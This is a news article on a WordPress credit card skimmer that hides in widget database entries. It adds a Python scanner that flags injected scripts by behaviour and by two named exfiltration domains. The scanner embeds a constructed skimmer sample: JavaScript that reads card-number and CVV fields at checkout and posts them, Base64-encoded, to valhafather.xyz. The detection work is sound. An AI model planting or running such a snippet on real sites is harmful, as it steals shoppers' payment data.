WordPress users targeted by crafty new credit card skimmer malware
- Sucuri discovers malicious code embedded in WordPress sites
- The code collects and exfiltrates payment information from e-commerce websites
- The researchers warn WordPress site administrators to inspect all modified code
Cybercriminals are once again targeting WordPress websites with credit card skimmers, stealing victims’ sensitive payment information.
This time the company sounding the alarm is Sucuri, whose researcher Puja Srivastava recently published an analysis of the attack, noting that criminals are targeting WordPress e-commerce websites and inserting malicious JavaScript into one of the content management system's (CMS) own database tables, where file-based malware scanners do not look.
That stored script loads the credit card skimmer only when the victim reaches the point of entering payment details.
“The malware is activated specifically on checkout pages, by hijacking existing payment fields or injecting a fake credit card form,” the researcher said.
The unnamed skimmer is built to capture everything needed to make a fraudulent online purchase: card numbers, expiration dates, CVV codes and billing details.
Cybercriminals typically use stolen card data to fund malicious advertising campaigns on social media, buy malware or malware-as-a-service (MaaS), or buy gift cards, which are hard to trace.
Sucuri added that, rather than relying only on a fake form, the skimmer can also capture data typed into a site's legitimate payment fields in real time, so it works against a wider range of checkout pages.
The stolen data is Base64-encoded and AES-CBC-encrypted so that the outbound request looks like ordinary traffic and resists casual inspection, then exfiltrated to a server under the attacker's control (either "valhafather(.)xyz" or "fqbe23(.)xyz"). Because the payload is encrypted, a web application firewall inspecting request bodies will not see card numbers in it; blocking or alerting on those domains at the network edge is the more practical control.
To find and remove the malware, Sucuri suggests inspecting all custom HTML widgets: log into the WordPress admin panel, go to wp-admin > Appearance > Widgets and check every Custom HTML block widget for unfamiliar <script> tags or other unexpected markup. The researchers also suggested mitigations, including regular updates, auditing administrator accounts (an attacker needs admin access to edit widgets), file integrity monitoring, and running a web application firewall. Note that because this skimmer lives in the database rather than on disk, file integrity monitoring alone will not catch it; the widget and options data needs checking as well.
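The manual widget review above scales poorly across many sites. The following is an added example, not Sucuri's tooling or code from the article: a Python scanner that walks the PHP-serialized `widget_block` / `widget_custom_html` option values as they are stored in `wp_options`, extracts each widget's HTML, and flags the behaviours the article describes (a script that triggers on checkout URLs, reads card fields, Base64/AES-encodes data, or talks to the two named exfiltration domains). The sample rows, the `SITE_HOSTS` allowlist and the skimmer-style snippet are constructed for the example; on a live site the rows would come from `wp option get widget_block` or a query against `wp_options`.

```python
"""Offline scan of WordPress widget options for skimmer-style injected JavaScript.

Added example; not Sucuri's scanner. The rows below are constructed to mimic
wp_options entries (option_name, option_value). On a live site they would come
from `wp option get widget_block` or
`SELECT option_name, option_value FROM wp_options WHERE option_name LIKE 'widget_%'`.
"""
import re
from urllib.parse import urlparse

# Hosts the site legitimately references; anything else is "external" and worth
# a look. Hypothetical value for this example.
SITE_HOSTS = {"shop.example.com"}

# Exfiltration domains named (defanged) in the article.
EXFIL_DOMAINS = {"valhafather.xyz", "fqbe23.xyz"}

# Behavioural indicators taken from the article: lives in a widget, triggers on
# checkout URLs, reads card fields, Base64/AES-encodes the data, may inject a form.
PATTERNS = {
    "script_tag": re.compile(r"<script\b", re.I),
    "checkout_trigger": re.compile(r"(location|href|pathname)[^;]{0,60}checkout", re.I),
    "card_field_access": re.compile(r"card[-_ ]?number|\bcvv\b|\bcvc\b|expir", re.I),
    "base64_use": re.compile(r"\b(atob|btoa)\s*\(", re.I),
    "aes_use": re.compile(r"CryptoJS|\bAES\b|mode\.CBC"),
    "form_injection": re.compile(r"innerHTML\s*=|insertAdjacentHTML|appendChild"),
}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)

# Each widget's HTML sits under a length-prefixed 's:7:"content";s:<len>:"...";'
# entry. Walking by the declared byte length is safer than matching quotes,
# since the HTML itself contains quotes.
CONTENT_RE = re.compile(rb's:7:"content";s:(\d+):"')


def widget_contents(blob: bytes) -> list[str]:
    """Return the HTML of every widget stored in a serialized option value."""
    out, pos = [], 0
    while (m := CONTENT_RE.search(blob, pos)):
        n, start = int(m.group(1)), m.end()
        out.append(blob[start:start + n].decode("utf-8", "replace"))
        pos = start + n
    return out


def scan_html(html: str) -> dict:
    """Collect indicator hits and referenced hosts for one widget's HTML."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(html)} - {None}
    return {
        "indicators": [name for name, rx in PATTERNS.items() if rx.search(html)],
        "ioc_domains": sorted(hosts & EXFIL_DOMAINS),
        "external_hosts": sorted(hosts - SITE_HOSTS),
    }


def verdict(result: dict) -> str:
    """Rank a widget: known IOC > script with skimmer traits > anything to review."""
    ind = set(result["indicators"])
    if result["ioc_domains"]:
        return "malicious"
    if "script_tag" in ind and ind & {"checkout_trigger", "card_field_access", "base64_use", "aes_use"}:
        return "suspicious"
    if "script_tag" in ind or result["external_hosts"]:
        return "review"
    return "clean"


def scan_options(rows) -> list[dict]:
    """rows: iterable of (option_name, option_value bytes) from wp_options."""
    findings = []
    for name, value in rows:
        if not name.startswith("widget_"):
            continue
        for idx, html in enumerate(widget_contents(value)):
            r = scan_html(html)
            findings.append({"option": name, "widget": idx, "verdict": verdict(r), **r})
    return findings


def make_widget_block(contents: list[str]) -> bytes:
    """Serialize widget HTML the way WordPress does (used to build the samples)."""
    parts = []
    for i, html in enumerate(contents, start=2):
        b = html.encode()
        parts.append(b'i:%d;a:1:{s:7:"content";s:%d:"%s";}' % (i, len(b), b))
    body = b"".join(parts) + b's:12:"_multiwidget";i:1;'
    return b"a:%d:{%s}" % (len(contents) + 1, body)


# Constructed samples: a benign promo widget and a skimmer-style script that
# mimics the behaviour the article describes (checkout trigger, card-field read,
# Base64, POST to an IOC domain). Not the actual malware.
BENIGN = '<p>Free shipping over $50. <a href="https://shop.example.com/shipping">Details</a></p>'
SKIMMER = """<script>(function(){
if(!location.href.includes("checkout"))return;
var n=document.querySelector("#card-number"),c=document.querySelector("#cvv");
document.querySelector("#place_order").addEventListener("click",function(){
fetch("https://valhafather.xyz/collect",{method:"POST",body:btoa(JSON.stringify({n:n.value,c:c.value}))});});
})();</script>"""

SAMPLE_ROWS = [
    ("siteurl", b"https://shop.example.com"),  # ignored: not a widget option
    ("widget_block", make_widget_block([BENIGN, SKIMMER])),
]

if __name__ == "__main__":
    for f in scan_options(SAMPLE_ROWS):
        print(f"{f['option']}[{f['widget']}]: {f['verdict']} {f['indicators']} ioc={f['ioc_domains']}")
```

The IOC domains give a hard "malicious" verdict; the behavioural patterns are deliberately loose, so treat "suspicious" and "review" as a triage queue rather than a verdict, and compare any flagged widget against a known-good backup of the options table.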
Skimmers seem to be making a comeback. Less than three weeks ago, the European Space Agency's official web shop was found to be hosting this type of malicious code, which stole payment details, including card data, from customers.
Via The Hacker News